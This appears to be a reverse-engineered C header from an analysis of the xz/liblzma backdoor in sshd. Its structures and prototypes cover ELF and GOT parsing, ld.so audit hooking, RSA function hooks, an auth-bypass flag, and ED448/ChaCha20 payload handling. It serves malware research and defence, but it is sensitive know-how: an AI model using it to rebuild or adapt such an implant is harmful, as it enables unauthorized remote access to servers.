16 #include <sys/select.h>
24 typedef uintptr_t uptr;
27 typedef unsigned int pid_t;
28 typedef unsigned int uid_t;
29 typedef unsigned int gid_t;
30 typedef unsigned int mode_t;
32 typedef uint16_t Elf64_Half;
33 typedef uint32_t Elf64_Word;
34 typedef int32_t Elf64_Sword;
35 typedef uint64_t Elf64_Xword;
36 typedef int64_t Elf64_Sxword;
37 typedef uint32_t Elf32_Addr;
38 typedef uint64_t Elf64_Addr;
39 typedef uint64_t Elf64_Off;
40 typedef uint16_t Elf64_Section;
42 typedef Elf64_Xword Elf64_Relr;
44 #define EI_NIDENT (16)
47 unsigned char e_ident[EI_NIDENT];
56 Elf64_Half e_phentsize;
58 Elf64_Half e_shentsize;
60 Elf64_Half e_shstrndx;
89 unsigned char st_info;
90 unsigned char st_other;
91 Elf64_Section st_shndx;
100 Elf64_Sxword r_addend;
104 Elf32_Sym, Elf64_Relr,
105 Elf64_Verdef, Elf64_Versym, sigset_t, fd_set, EVP_PKEY, RSA, DSA,
106 BIGNUM, EC_POINT, EC_KEY, EC_GROUP, EVP_MD, point_conversion_form_t,
107 EVP_CIPHER, EVP_CIPHER_CTX, ENGINE, EVP_MD_CTX, EVP_PKEY_CTX, BN_CTX;
109 void *(*alloc)(
void *opaque,
size_t nmemb,
size_t size);
110 void (*free)(
void *opaque,
void *ptr);
114 typedef long int Lmid_t;
115 #define ElfW(Sym) Elf64_Sym
133 LZMA_CHECK_CRC32 = 1,
140 LZMA_CHECK_CRC64 = 4,
147 LZMA_CHECK_SHA256 = 10
159 #include <openssl/dsa.h>
160 #include <openssl/ec.h>
161 #include <openssl/evp.h>
162 #include <openssl/rsa.h>
165 typedef Elf64_Xword Elf64_Relr;
168 #define UPTR(x) ((uptr)(x))
169 #define PTRADD(a, b) (UPTR(a) + UPTR(b))
170 #define PTRDIFF(a, b) (UPTR(a) - UPTR(b))
178 #define BUILD_BUG_ON_ZERO(e) ((int)(sizeof(struct { int:(-!!(e)); })))
179 #define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
180 #define __must_be_array(a) BUILD_BUG_ON_ZERO(__same_type((a), &(a)[0]))
181 #define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0]) + __must_be_array(arr))
187 unsigned int bindflags;
190 typedef struct link_map *lookup_t;
197 uint32_t bloom_shift;
207 struct La_i86_retval;
208 struct La_x86_64_regs;
209 struct La_x86_64_retval;
211 struct La_x32_retval;
217 void (*activity) (uintptr_t *,
unsigned int);
218 char *(*objsearch) (
const char *, uintptr_t *,
unsigned int);
219 unsigned int (*objopen) (
struct link_map *, Lmid_t, uintptr_t *);
220 void (*preinit) (uintptr_t *);
223 uintptr_t (*symbind32) (Elf32_Sym *,
unsigned int, uintptr_t *,
224 uintptr_t *,
unsigned int *,
const char *);
225 uintptr_t (*symbind64) (Elf64_Sym *,
unsigned int, uintptr_t *,
226 uintptr_t *,
unsigned int *,
const char *);
230 Elf32_Addr (*i86_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
231 uintptr_t *,
struct La_i86_regs *,
232 unsigned int *,
const char *name,
233 long int *framesizep);
234 Elf64_Addr (*x86_64_gnu_pltenter) (Elf64_Sym *,
unsigned int,
236 uintptr_t *,
struct La_x86_64_regs *,
237 unsigned int *,
const char *name,
238 long int *framesizep);
239 Elf32_Addr (*x32_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
240 uintptr_t *,
struct La_x32_regs *,
241 unsigned int *,
const char *name,
242 long int *framesizep);
246 unsigned int (*i86_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
247 uintptr_t *,
const struct La_i86_regs *,
248 struct La_i86_retval *,
const char *);
249 unsigned int (*x86_64_gnu_pltexit) (Elf64_Sym *,
unsigned int,
252 const struct La_x86_64_regs *,
253 struct La_x86_64_retval *,
255 unsigned int (*x32_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
257 const struct La_x32_regs *,
258 struct La_x86_64_retval *,
261 unsigned int (*objclose) (uintptr_t *);
293 #define CHACHA20_KEY_SIZE 32
294 #define CHACHA20_IV_SIZE 16
295 #define SHA256_DIGEST_SIZE 32
296 #define ED448_KEY_SIZE 57
297 #define ED448_SIGNATURE_SIZE 114
299 #define X_BN_num_bytes(bits) (((bits)+7)/8)
302 #define XZDASM_OPC(op) (op - 0x80)
334 DF_MEM_SEG_OFFS = 0x4,
381 X_ELF_DYNAMIC_LINKER = 1,
387 XREF_xcalloc_zero_size = 0,
388 XREF_Could_not_chdir_to_home_directory_s_s = 1,
389 XREF_list_hostkey_types = 2,
390 XREF_demote_sensitive_data = 3,
391 XREF_mm_terminate = 4,
392 XREF_mm_pty_allocate = 5,
393 XREF_mm_do_pam_account = 6,
394 XREF_mm_session_pty_cleanup2 = 7,
395 XREF_mm_getpwnamallow = 8,
396 XREF_mm_sshpam_init_ctx = 9,
397 XREF_mm_sshpam_query = 10,
398 XREF_mm_sshpam_respond = 11,
399 XREF_mm_sshpam_free_ctx = 12,
400 XREF_mm_choose_dh = 13,
401 XREF_sshpam_respond = 14,
402 XREF_sshpam_auth_passwd = 15,
403 XREF_sshpam_query = 16,
405 XREF_mm_request_send = 18,
406 XREF_mm_log_handler = 19,
407 XREF_Could_not_get_agent_socket = 20,
408 XREF_auth_root_allowed = 21,
409 XREF_mm_answer_authpassword = 22,
410 XREF_mm_answer_keyallowed = 23,
411 XREF_mm_answer_keyverify = 24,
412 XREF_48s_48s_d_pid_ld_ = 25,
413 XREF_Unrecognized_internal_syslog_level_code_d = 26
419 STR_48s_48s_d_pid_ld_ = 0xd8,
421 STR_usr_sbin_sshd = 0x108,
422 STR_Accepted_password_for = 0x870,
423 STR_Accepted_publickey_for = 0x1a0,
424 STR_BN_bin2bn = 0xc40,
425 STR_BN_bn2bin = 0x6d0,
428 STR_BN_num_bits = 0x4e0,
429 STR_Connection_closed_by = 0x790,
430 STR_Could_not_chdir_to_home_directory_s_s = 0x18,
431 STR_Could_not_get_agent_socket = 0xb0,
433 STR_DSA_get0_pqg = 0x9d0,
434 STR_DSA_get0_pub_key = 0x468,
435 STR_EC_KEY_get0_group = 0x7e8,
436 STR_EC_KEY_get0_public_key = 0x268,
437 STR_EC_POINT_point2oct = 0x6e0,
438 STR_EVP_CIPHER_CTX_free = 0xb28,
439 STR_EVP_CIPHER_CTX_new = 0x838,
440 STR_EVP_DecryptFinal_ex = 0x2a8,
441 STR_EVP_DecryptInit_ex = 0xc08,
442 STR_EVP_DecryptUpdate = 0x3f0,
443 STR_EVP_Digest = 0xf8,
444 STR_EVP_DigestVerify = 0x408,
445 STR_EVP_DigestVerifyInit = 0x118,
446 STR_EVP_MD_CTX_free = 0xd10,
447 STR_EVP_MD_CTX_new = 0xaf8,
448 STR_EVP_PKEY_free = 0x6f8,
449 STR_EVP_PKEY_new_raw_public_key = 0x758,
450 STR_EVP_PKEY_set1_RSA = 0x510,
451 STR_EVP_chacha20 = 0xc28,
452 STR_EVP_sha256 = 0xc60,
454 STR_GLIBC_2_2_5 = 0x8c0,
455 STR_GLRO_dl_naudit_naudit = 0x6a8,
456 STR_KRB5CCNAME = 0x1e0,
457 STR_LD_AUDIT = 0xcf0,
458 STR_LD_BIND_NOT = 0xbc0,
459 STR_LD_DEBUG = 0xa90,
460 STR_LD_PROFILE = 0xb98,
461 STR_LD_USE_LOAD_BIAS = 0x3e0,
463 STR_RSA_free = 0xac0,
464 STR_RSA_get0_key = 0x798,
466 STR_RSA_public_decrypt = 0x1d0,
467 STR_RSA_set0_key = 0x540,
468 STR_RSA_sign = 0x8f8,
471 STR_Unrecognized_internal_syslog_level_code_d = 0xe0,
472 STR_WAYLAND_DISPLAY = 0x158,
473 STR_errno_location = 0x878,
474 STR_libc_stack_end = 0x2b0,
475 STR_libc_start_main = 0x228,
476 STR_dl_audit_preinit = 0xa60,
477 STR_dl_audit_symbind_alt = 0x9c8,
480 STR_rtld_global = 0x5b8,
481 STR_rtld_global_ro = 0xa98,
482 STR_auth_root_allowed = 0xb8,
483 STR_authenticating = 0x1d8,
484 STR_demote_sensitive_data = 0x28,
486 STR_ld_linux_x86_64_so = 0xa48,
488 STR_libcrypto_so = 0x7c0,
489 STR_liblzma_so = 0x590,
490 STR_libsystemd_so = 0x938,
491 STR_list_hostkey_types = 0x20,
492 STR_malloc_usable_size = 0x440,
493 STR_mm_answer_authpassword = 0xc0,
494 STR_mm_answer_keyallowed = 0xc8,
495 STR_mm_answer_keyverify = 0xd0,
496 STR_mm_answer_pam_start = 0x948,
497 STR_mm_choose_dh = 0x78,
498 STR_mm_do_pam_account = 0x40,
499 STR_mm_getpwnamallow = 0x50,
500 STR_mm_log_handler = 0xa8,
501 STR_mm_pty_allocate = 0x38,
502 STR_mm_request_send = 0xa0,
503 STR_mm_session_pty_cleanup2 = 0x48,
504 STR_mm_sshpam_free_ctx = 0x70,
505 STR_mm_sshpam_init_ctx = 0x58,
506 STR_mm_sshpam_query = 0x60,
507 STR_mm_sshpam_respond = 0x68,
508 STR_mm_terminate = 0x30,
509 STR_parse_PAM = 0xc58,
510 STR_password = 0x400,
513 STR_publickey = 0x7b8,
515 STR_rsa_sha2_256 = 0x710,
516 STR_setlogmask = 0x428,
517 STR_setresgid = 0x5f0,
518 STR_setresuid = 0xab8,
519 STR_shutdown = 0x760,
521 STR_ssh_rsa_cert_v01_openssh_com = 0x2c8,
522 STR_sshpam_auth_passwd = 0x88,
523 STR_sshpam_query = 0x90,
524 STR_sshpam_respond = 0x80,
525 STR_start_pam = 0x98,
530 STR_xcalloc_zero_size = 0x10,
531 STR_yolAbejyiejuvnupEvjtgvsh5okmkAvj = 0xb00,
536 #define assert_offset(t, f, o) static_assert(offsetof(t, f) == o)
538 #define assert_offset(t, f, o)
541 #define CONCAT(x, y) x ## y
542 #define EXPAND(x, y) CONCAT(x, y)
543 #define PADDING(size) u8 EXPAND(_unknown, __LINE__)[size]
549 #define PERMIT_NOT_SET -1
551 #define PERMIT_FORCED_ONLY 1
552 #define PERMIT_NO_PASSWD 2
571 struct sshkey **host_keys;
572 struct sshkey **host_pubkeys;
573 struct sshkey **host_certificates;
603 struct sshbuf *sk_key_handle;
604 struct sshbuf *sk_reserved;
606 struct sshkey_cert *cert;
608 u8 *shielded_private;
611 size_t shield_prekey_len;
614 typedef struct __attribute__((packed))
got_ctx {
638 assert_offset(
got_ctx_t, return_address, 0x8);
639 assert_offset(
got_ctx_t, cpuid_fn, 0x10);
640 assert_offset(
got_ctx_t, got_offset, 0x18);
641 static_assert(
sizeof(
got_ctx_t) == 0x20);
662 u64 instruction_size;
664 struct __attribute__((packed)) {
683 struct __attribute__((packed)) {
695 struct __attribute__((packed)) {
697 struct __attribute__((packed)) {
712 u64 operand_zeroextended;
719 assert_offset(
dasm_ctx_t, instruction_size, 8);
722 assert_offset(
dasm_ctx_t, lock_rep_byte, 0x14);
742 assert_offset(
dasm_ctx_t, operand_zeroextended, 0x40);
743 assert_offset(
dasm_ctx_t, operand_size, 0x48);
810 Elf64_Versym *versym;
811 Elf64_Rela *rela_relocs;
814 Elf64_Relr *relr_relocs;
828 u64 rodata_segment_start;
829 u64 rodata_segment_size;
830 u64 data_segment_start;
831 u64 data_segment_size;
832 u64 data_segment_alignment;
844 u32 gnu_hash_bloom_shift;
847 u32 *gnu_hash_buckets;
856 assert_offset(
elf_info_t, dyn_num_entries, 0x28);
860 assert_offset(
elf_info_t, plt_relocs_num, 0x48);
861 assert_offset(
elf_info_t, gnurelro_found, 0x4C);
862 assert_offset(
elf_info_t, gnurelro_vaddr, 0x50);
863 assert_offset(
elf_info_t, gnurelro_memsize, 0x58);
868 assert_offset(
elf_info_t, rela_relocs_num, 0x80);
870 assert_offset(
elf_info_t, relr_relocs_num, 0x90);
871 assert_offset(
elf_info_t, code_segment_start, 0x98);
872 assert_offset(
elf_info_t, code_segment_size, 0xA0);
873 assert_offset(
elf_info_t, rodata_segment_start, 0xA8);
874 assert_offset(
elf_info_t, rodata_segment_size, 0xB0);
875 assert_offset(
elf_info_t, data_segment_start, 0xB8);
876 assert_offset(
elf_info_t, data_segment_size, 0xC0);
877 assert_offset(
elf_info_t, data_segment_alignment, 0xC8);
879 assert_offset(
elf_info_t, gnu_hash_nbuckets, 0xd8);
880 assert_offset(
elf_info_t, gnu_hash_last_bloom, 0xdc);
881 assert_offset(
elf_info_t, gnu_hash_bloom_shift, 0xe0);
882 assert_offset(
elf_info_t, gnu_hash_bloom, 0xe8);
883 assert_offset(
elf_info_t, gnu_hash_buckets, 0xf0);
884 assert_offset(
elf_info_t, gnu_hash_chain, 0xf8);
888 u32 resolved_imports_count;
890 size_t (*malloc_usable_size)(
void *ptr);
891 uid_t (*getuid)(void);
892 void (*exit)(
int status);
893 int (*setresgid)(gid_t rgid, gid_t egid, gid_t sgid);
894 int (*setresuid)(uid_t ruid, uid_t euid, uid_t suid);
895 int (*system)(
const char *command);
896 ssize_t (*write)(
int fd,
const void *buf,
size_t count);
898 int nfds, fd_set *readfds, fd_set *writefds,
899 fd_set *exceptfds,
const struct timespec *timeout,
900 const sigset_t *sigmask);
901 ssize_t (*read)(
int fd,
void *buf,
size_t count);
902 int *(*__errno_location)(void);
903 int (*setlogmask)(
int mask);
904 int (*shutdown)(
int sockfd,
int how);
905 void *__libc_stack_end;
924 typedef int (*pfn_RSA_public_decrypt_t)(
925 int flen,
unsigned char *from,
unsigned char *to,
926 RSA *rsa,
int padding);
927 typedef int (*pfn_EVP_PKEY_set1_RSA_t)(EVP_PKEY *pkey,
struct rsa_st *key);
928 typedef void (*pfn_RSA_get0_key_t)(
930 const BIGNUM **n,
const BIGNUM **e,
const BIGNUM **d);
934 pfn_EVP_PKEY_set1_RSA_t EVP_PKEY_set1_RSA;
936 void (*RSA_get0_key_null)(
937 const RSA *r,
const BIGNUM **n,
938 const BIGNUM **e,
const BIGNUM **d);
954 void (*DSA_get0_pqg)(
955 const DSA *d,
const BIGNUM **p,
956 const BIGNUM **q,
const BIGNUM **g);
957 const BIGNUM *(*DSA_get0_pub_key)(
const DSA *d);
958 size_t (*EC_POINT_point2oct)(
959 const EC_GROUP *group,
const EC_POINT *p,
960 point_conversion_form_t form,
unsigned char *buf,
961 size_t len, BN_CTX *ctx);
962 EC_POINT *(*EC_KEY_get0_public_key)(
const EC_KEY *key);
963 const EC_GROUP *(*EC_KEY_get0_group)(
const EC_KEY *key);
964 EVP_MD *(*EVP_sha256)(void);
965 pfn_RSA_get0_key_t RSA_get0_key;
966 int (*BN_num_bits)(
const BIGNUM *a);
967 EVP_PKEY *(*EVP_PKEY_new_raw_public_key)(
969 const unsigned char *key,
size_t keylen);
970 EVP_MD_CTX *(*EVP_MD_CTX_new)(void);
971 int (*EVP_DigestVerifyInit)(
972 EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
973 const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
974 int (*EVP_DigestVerify)(
975 EVP_MD_CTX *ctx,
const unsigned char *sig,
976 size_t siglen,
const unsigned char *tbs,
size_t tbslen);
977 void (*EVP_MD_CTX_free)(EVP_MD_CTX *ctx);
978 void (*EVP_PKEY_free)(EVP_PKEY *key);
979 EVP_CIPHER_CTX *(*EVP_CIPHER_CTX_new)(void);
980 int (*EVP_DecryptInit_ex)(
981 EVP_CIPHER_CTX *ctx,
const EVP_CIPHER *type,
982 ENGINE *impl,
const unsigned char *key,
const unsigned char *iv);
983 int (*EVP_DecryptUpdate)(
984 EVP_CIPHER_CTX *ctx,
unsigned char *out,
985 int *outl,
const unsigned char *in,
int inl);
986 int (*EVP_DecryptFinal_ex)(EVP_CIPHER_CTX *ctx,
unsigned char *outm,
int *outl);
987 void (*EVP_CIPHER_CTX_free)(EVP_CIPHER_CTX *ctx);
988 const EVP_CIPHER *(*EVP_chacha20)(void);
989 RSA *(*RSA_new)(void);
990 BIGNUM *(*BN_dup)(
const BIGNUM *from);
991 BIGNUM *(*BN_bin2bn)(
const unsigned char *s,
int len, BIGNUM *ret);
992 int (*RSA_set0_key)(RSA *r, BIGNUM *n, BIGNUM *e, BIGNUM *d);
994 const void *data,
size_t count,
unsigned char *md,
995 unsigned int *size,
const EVP_MD *type, ENGINE *impl);
998 const unsigned char *m,
unsigned int m_len,
999 unsigned char *sigret,
unsigned int *siglen, RSA *rsa);
1000 int (*BN_bn2bin)(
const BIGNUM *a,
unsigned char *to);
1001 void (*RSA_free)(RSA *rsa);
1002 void (*BN_free)(BIGNUM *a);
1004 u32 resolved_imports_count;
1050 typedef int (*sshd_monitor_func_t)(
struct ssh *ssh,
int sock,
struct sshbuf *m);
1053 BOOL have_mm_answer_keyallowed;
1054 BOOL have_mm_answer_authpassword;
1055 BOOL have_mm_answer_keyverify;
1058 void *mm_answer_keyallowed;
1059 void *mm_answer_keyverify;
1060 void *mm_answer_authpassword_start;
1061 void *mm_answer_authpassword_end;
1062 sshd_monitor_func_t *mm_answer_authpassword_ptr;
1063 int monitor_reqtype_authpassword;
1065 void *mm_answer_keyallowed_start;
1066 void *mm_answer_keyallowed_end;
1067 void *mm_answer_keyallowed_ptr;
1068 u32 mm_answer_keyallowed_reqtype;
1070 void *mm_answer_keyverify_start;
1071 void *mm_answer_keyverify_end;
1072 void *mm_answer_keyverify_ptr;
1079 char *STR_unknown_ptr;
1080 void *mm_request_send_start;
1081 void *mm_request_send_end;
1082 PADDING(
sizeof(u32));
1083 PADDING(
sizeof(u32));
1085 int *permit_root_login_ptr;
1086 char *STR_without_password;
1087 char *STR_publickey;
1090 assert_offset(
sshd_ctx_t, have_mm_answer_keyallowed, 0x0);
1091 assert_offset(
sshd_ctx_t, have_mm_answer_authpassword, 0x4);
1092 assert_offset(
sshd_ctx_t, have_mm_answer_keyverify, 0x8);
1094 assert_offset(
sshd_ctx_t, mm_answer_keyallowed, 0x18);
1095 assert_offset(
sshd_ctx_t, mm_answer_keyverify, 0x20);
1096 assert_offset(
sshd_ctx_t, mm_answer_authpassword_start, 0x28);
1097 assert_offset(
sshd_ctx_t, mm_answer_authpassword_end, 0x30);
1098 assert_offset(
sshd_ctx_t, mm_answer_authpassword_ptr, 0x38);
1099 assert_offset(
sshd_ctx_t, monitor_reqtype_authpassword, 0x40);
1100 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_start, 0x48);
1101 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_end, 0x50);
1102 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_ptr, 0x58);
1103 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_reqtype, 0x60);
1104 assert_offset(
sshd_ctx_t, mm_answer_keyverify_start, 0x68);
1105 assert_offset(
sshd_ctx_t, mm_answer_keyverify_end, 0x70);
1106 assert_offset(
sshd_ctx_t, mm_answer_keyverify_ptr, 0x78);
1107 assert_offset(
sshd_ctx_t, writebuf_size, 0x84);
1109 assert_offset(
sshd_ctx_t, STR_unknown_ptr, 0xA0);
1110 assert_offset(
sshd_ctx_t, mm_request_send_start, 0xA8);
1111 assert_offset(
sshd_ctx_t, mm_request_send_end, 0xB0);
1112 assert_offset(
sshd_ctx_t, use_pam_ptr, 0xC0);
1113 assert_offset(
sshd_ctx_t, permit_root_login_ptr, 0xC8);
1114 assert_offset(
sshd_ctx_t, STR_without_password, 0xD0);
1115 assert_offset(
sshd_ctx_t, STR_publickey, 0xD8);
1122 SYSLOG_LEVEL_VERBOSE,
1123 SYSLOG_LEVEL_DEBUG1,
1124 SYSLOG_LEVEL_DEBUG2,
1125 SYSLOG_LEVEL_DEBUG3,
1126 SYSLOG_LEVEL_NOT_SET = -1
1129 typedef void (*log_handler_fn)(
1136 BOOL logging_disabled;
1137 BOOL log_hooking_possible;
1138 BOOL syslog_disabled;
1140 char *STR_percent_s;
1141 char *STR_Connection_closed_by;
1143 char *STR_authenticating;
1147 void *log_handler_ptr;
1148 void *log_handler_ctx_ptr;
1149 log_handler_fn orig_log_handler;
1150 void *orig_log_handler_ctx;
1152 void (*mm_log_handler)(
int level,
int forced,
const char *msg,
void *ctx);
1173 struct __attribute__((packed)) {
1181 struct __attribute__((packed)) {
1182 u8 sshbuf_data_qword_index;
1183 u8 sshbuf_size_qword_index;
1241 struct monitor **struct_monitor_ptr_address;
1278 u64 sock_read_buf_size;
1279 u8 sock_read_buf[64];
1280 u64 payload_data_size;
1285 u32 sshd_host_pubkey_idx;
1290 u8 secret_data[ED448_KEY_SIZE];
1296 u8 shift_operations[31];
1341 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1444 void (*_dl_audit_symbind_alt)(
struct link_map *l,
const ElfW(Sym) *ref,
void **value, lookup_t result);
1454 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
1460 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1465 pfn_RSA_get0_key_t hook_RSA_get0_key;
1467 u64 hooks_installed;
1470 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
1471 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
1472 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
1473 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
1474 assert_offset(
ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
1475 assert_offset(
ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
1476 assert_offset(
ldso_ctx_t, _dl_audit_ptr, 0x70);
1477 assert_offset(
ldso_ctx_t, _dl_naudit_ptr, 0x78);
1478 assert_offset(
ldso_ctx_t, hooked_audit_ifaces, 0x80);
1480 assert_offset(
ldso_ctx_t, libcrypto_l_name, 0xF8);
1481 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
1482 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
1483 assert_offset(
ldso_ctx_t, hook_RSA_public_decrypt, 0x110);
1484 assert_offset(
ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
1485 assert_offset(
ldso_ctx_t, hook_RSA_get0_key, 0x120);
1487 assert_offset(
ldso_ctx_t, hooks_installed, 0x130);
1498 u64 signed_data_size;
1516 uintptr_t (*symbind64)(
1517 Elf64_Sym *sym,
unsigned int ndx,
1518 uptr *refcook, uptr *defcook,
1519 unsigned int flags,
const char *symname);
1520 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
1521 pfn_RSA_get0_key_t hook_RSA_get0_key;
1522 log_handler_fn mm_log_handler;
1523 PADDING(
sizeof(
void *));
1524 PADDING(
sizeof(
void *));
1525 sshd_monitor_func_t mm_answer_keyallowed;
1526 sshd_monitor_func_t mm_answer_keyverify;
1527 PADDING(
sizeof(
void *));
1583 Elf64_Ehdr *dynamic_linker_ehdr;
1584 void **__libc_stack_end;
1588 assert_offset(
main_elf_t, dynamic_linker_ehdr, 0x8);
1589 assert_offset(
main_elf_t, __libc_stack_end, 0x10);
1653 struct link_map *liblzma_map;
1654 struct link_map *libcrypto_map;
1655 struct link_map *libsystemd_map;
1656 struct link_map *libc_map;
1693 lzma_allocator fake_allocator;
1769 u32 operation_index;
1792 typedef union __attribute__((packed)) {
1806 u8 signature[ED448_SIGNATURE_SIZE];
1824 #define TEST_FLAG(x, flag) (((x) & (flag)) != 0)
1863 X_FLAGS2_AUTH_BYPASS = 0x4,
1901 const BIGNUM *rsa_n;
1902 const BIGNUM *rsa_e;
1905 PADDING(CHACHA20_KEY_SIZE + CHACHA20_IV_SIZE);
1906 u8 ivec[CHACHA20_IV_SIZE];
1907 u8 ed448_key[ED448_KEY_SIZE];
1914 assert_offset(
key_ctx_t, payload, 0x15);
1916 assert_offset(
key_ctx_t, ed448_key, 0x27D);
1926 const BIGNUM *rsa_n;
1927 const BIGNUM *rsa_e;
1929 u16 payload_body_size;
1948 struct timespec timespec;
1963 u64 hostkey_hash_offset;
1965 u8 *payload_data_ptr;
1974 struct __attribute__((packed)) {
1979 struct __attribute__((packed)) {
1981 u64 num_host_pubkeys;
1982 u8 ed448_key[ED448_KEY_SIZE];
2053 PADDING(
sizeof(u64));
2060 PADDING(
sizeof(u64));
2061 PADDING(
sizeof(u64));
2068 PADDING(
sizeof(u64));
2083 PADDING(
sizeof(u64));
2084 lzma_allocator allocator;
2114 u8 *output_register;
2247 BOOL is_64bit_operand,
2270 BOOL is_64bit_operand,
2336 EncodedStringId encoded_string_id,
2390 FuncFindType find_mode);
2449 extern char *check_argument(
char arg_first_char,
char* arg_name);
2562 EncodedStringId encoded_string_id);
2596 StringXrefId xref_id,
2597 void **pOutCodeStart,
void **pOutCodeEnd,
2616 EncodedStringId *stringId_inOut,
2617 void *rodata_start_ptr);
2687 unsigned shift_count, BOOL start_from_call);
2701 unsigned operation_index,
2702 unsigned shift_count,
2703 int index, u8 *code);
2731 unsigned shift_count,
unsigned operation_index);
2776 u8 *call_site, u8 *code,
2778 unsigned shift_count,
unsigned operation_index);
2793 unsigned shift_count,
unsigned operation_index,
2911 struct link_map *libc,
2988 extern EncodedStringId
get_string_id(
const char *string_begin,
const char *string_end);
3029 extern unsigned int _get_cpuid_modified(
unsigned int leaf,
unsigned int *eax,
unsigned int *ebx,
unsigned int *ecx,
unsigned int *edx, u64 *caller_frame);
3042 extern void _cpuid_gcc(
unsigned int level,
unsigned int *a,
unsigned int *b,
unsigned int *c,
unsigned int *d);
3130 uptr *refcook, uptr *defcook,
3132 const char *symname);
3163 ptrdiff_t *libname_offset,
3191 ptrdiff_t *libname_offset,
3238 ptrdiff_t libname_offset,
3281 void **sensitive_data_out);
3302 void **sensitive_data_out,
3372 u8 *buffer, u64 bufferSize,
3453 u64 sshkey_digest_offset,
3454 u64 signed_data_size,
3472 BOOL skip_root_patch,
3474 BOOL replace_monitor_reqtype,
3475 int monitor_reqtype,
3503 u8 **code_start_out,
3541 void **monitor_field_ptr_out,
3559 void *mem_range_start,
3627 enum SocketMode socket_direction
3673 size_t *pOutPayloadSize,
3686 size_t payload_size,
3781 unsigned int num_pointers
3816 LogLevel level,
const char *fmt, ...);
3846 static_assert(
sizeof(global_ctx) == 0x8);
int RSA_public_decrypt(int flen, const unsigned char *from, unsigned char *to, RSA *rsa, int padding)
Definition: ssh_patch.c:37
ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:2025
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:2013
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:2019
data passed to functions that access the backdoor data
Definition: xzre.h:1597
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1642
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1687
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1692
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1647
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1677
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1682
elf_info_t dynamic_linker_info
ELF context for ld.so.
Definition: xzre.h:1673
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1667
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1697
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1652
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA_plt() in sshd
Definition: xzre.h:1731
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key_plt() in sshd
Definition: xzre.h:1736
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:1726
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:2039
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:2045
u8 flags2
see InstructionFlags2
Definition: xzre.h:672
u8 flags
see InstructionFlags
Definition: xzre.h:668
void * symbol_ptr
points to a symbol in memory will be used to find the GOT value
Definition: xzre.h:648
u64 * frame_address
stores the value of __builtin_frame_address(0)-16
Definition: xzre.h:653
array of ELF handles
Definition: xzre.h:1557
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1568
elf_info_t * main
this is for sshd
Definition: xzre.h:1562
u64 code_segment_size
page-aligned virtual size of the first executable ELF segment
Definition: xzre.h:826
u64 first_vaddr
virtual address of the first program header
Definition: xzre.h:755
u64 gnurelro_memsize
size of the GNU relro segment
Definition: xzre.h:801
Elf64_Verdef * verdef
pointer to the EFL symbol versioning (from DT_VERDEF)
Definition: xzre.h:805
u32 gnu_hash_last_bloom
last valid bloom value
Definition: xzre.h:843
Elf64_Dyn * dyn
pointer to the ELF dynamic segment
Definition: xzre.h:767
char * strtab
pointer to the ELF string table
Definition: xzre.h:775
Elf64_Phdr * phdrs
pointer to the ELF program headers array in memory
Definition: xzre.h:759
u32 gnu_hash_nbuckets
number of GNU hash buckets (from DT_GNU_HASH)
Definition: xzre.h:839
Elf64_Ehdr * elfbase
pointed to the ELF base address in memory
Definition: xzre.h:751
u64 e_phnum
copy of the ELF program header count from the ELF header
Definition: xzre.h:763
Elf64_Rela * plt_relocs
pointer to the ELF PLT relocations table
Definition: xzre.h:783
BOOL gnurelro_found
whether the loaded ELF contains PT_GNU_RELRO or not which specifies the location and size of a segmen...
Definition: xzre.h:793
u64 code_segment_start
page-aligned virtual address of the first executable ELF segment
Definition: xzre.h:821
u64 verdef_num
number of entries in the symbol versioning table
Definition: xzre.h:809
u64 gnurelro_vaddr
